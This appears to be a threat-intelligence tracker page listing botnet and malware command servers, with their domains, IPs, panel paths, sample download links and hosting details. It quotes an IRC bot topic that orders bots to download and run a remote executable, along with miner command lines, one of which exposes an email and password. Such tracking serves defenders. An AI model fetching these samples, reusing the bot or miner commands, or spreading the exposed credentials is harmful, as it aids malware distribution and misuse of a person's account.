Resolved : [securityspecialiastinc.in] To [106.187.88.52] Gate: securityspecialiastinc.in/p/gate.php Admin:securityspecialiastinc.in/p/admin.php sample: hxxp://106.187.88.52/p/p.exe Online Crypter: hxxp://securityspecialiastinc.in/crypt.php hosting infos: http://whois.domaintools.com/106.187.88.52
hackattaksuceuse.biz (Betabot http botnet hosted by Fastflux)
Server: hackattaksuceuse.biz Gate file: /~.homo/analytics.php Alternate domains: lavidalocapd.biz allahwouakbaaahhh.co.in amemeuch.biz betazbraxxx.co.in hacktipucov2.org jesaispastropkoimettre.org laradimcrelou.co.in thebossinfly.org tktlamifa.co.in whatdaaafuckinyourhead.biz x42v72.biz zbraaadanstfesse.org suxme.itsprosolutions.org This is the source of the citadel and pony just posted. I’m not sure why the owner would set up his betabot for fastflux and not his citadel though. Hosting infos: ;; QUESTION SECTION: ;hackattaksuceuse.biz.Read more...
89.163.181.135 (Citadel banking malware hosted by unitedcolo.de)
Server: 89.163.181.135 Gate file: /.~/ineed/stats.php Config file: /.~/ineed/file.php They forgot to remove the installation directory: hxxp://89.163.181.135/.~/ineed/install/ Found on the same betabot as the recently posted pony loader. Hosting infos: http://whois.domaintools.com/89.163.181.135
93.115.85.58 (Pony loader hosted by voxility.net)
Server: 93.115.85.58 Gate file: /pox/stats.php While investigating a betabot, I found a load of different malware. Here’s a pony loader. It downloads files from hxxp://cy-corp.com/pg/ Hosting infos: http://whois.domaintools.com/93.115.85.58
solutionswiki.com (Andromeda http botnet hosted by alibabahost.com)
Resolved solutionswiki.com to 109.163.233.107 Server: solutionswiki.com Gate file: /pages/image.php There is also a betabot hosted on the same domain. Mining infos: dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x Hosting infos: http://whois.domaintools.com/109.163.233.107
r.gigaionjumbie.biz (Power loader http botnet hosted by digital-forex.net)
Resolved r.gigaionjumbie.biz to 5.199.171.131, 5.199.171.132, 5.199.171.133 Server: r.gigaionjumbie.biz Gate file: /images/gx.php Alternate domains: x.dailyradio.su x.kei.su Hosting infos: http://whois.domaintools.com/5.199.171.131 http://whois.domaintools.com/5.199.171.132 http://whois.domaintools.com/5.199.171.133
ilikeithard.tk(Pony hosted in United States Kansas City Datashack Lc)
Resolved : [ilikeithard.tk] To [63.141.253.125] Panel: hxxp://ilikeithard.tk/Panel/admin.php Sample: directxex.com/uploads/1632963588.Pony.exe found by justaguy hosting infos: http://whois.domaintools.com/63.141.253.125
imgay.ddos.es (betabot http botnet hosted by Fastflux)
Server: imgay.ddos.es Gate file: /h/order.php Alternate domains: imgay.ddos.cat imgay.theswat.net ddos.cat has been linked to botnets before Hosting infos: ;; QUESTION SECTION: ;imgay.ddos.es. IN A ;; ANSWER SECTION: imgay.ddos.es. 149 IN A 94.27.87.58 imgay.ddos.es. 149 IN A 98.195.89.225 imgay.ddos.es. 149 IN A 174.112.126.155 imgay.ddos.es. 149 IN A 176.40.77.176 imgay.ddos.es. 149 IN A 178.150.207.252 imgay.ddos.es. 149 INRead more...
t7v4d.com(irc botnet hosted in United States Phoenix Secured Servers Llc)
Thanks to this guy for the sample Resolved : [t7v4d.com] To [108.170.24.42] Server: t7v4d.com:4040 Now talking in ##tntTopic is ‘!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r’ hosting infos: http://whois.domaintools.com/108.170.24.42
privatesmartscreen.nl(Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS Queries: privatesmartscreen.nl DNS_TYPE_A 159.253.0.151 HTTP Conversations: 159.253.0.151:80 – [privatesmartscreen.nl] Request: GET /Bitcoin/host.txt 149.210.128.55:80 – [149.210.128.55] Request: GET /bitconi/winlogon32.exe Request: GET /bitconi/winlogon64.exe Request: GET /bitconi/usft_ext.dll Request: GET /bitconi/miner.dll Request: GET /bitconi/coinutil.dll Request: GET /ptx.exe Request: GET /bitconi/btc.exe Request: GET /bitconi/phatk.exe Dutch hecker here: winlogon32.exe” -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321 Samples:Read more...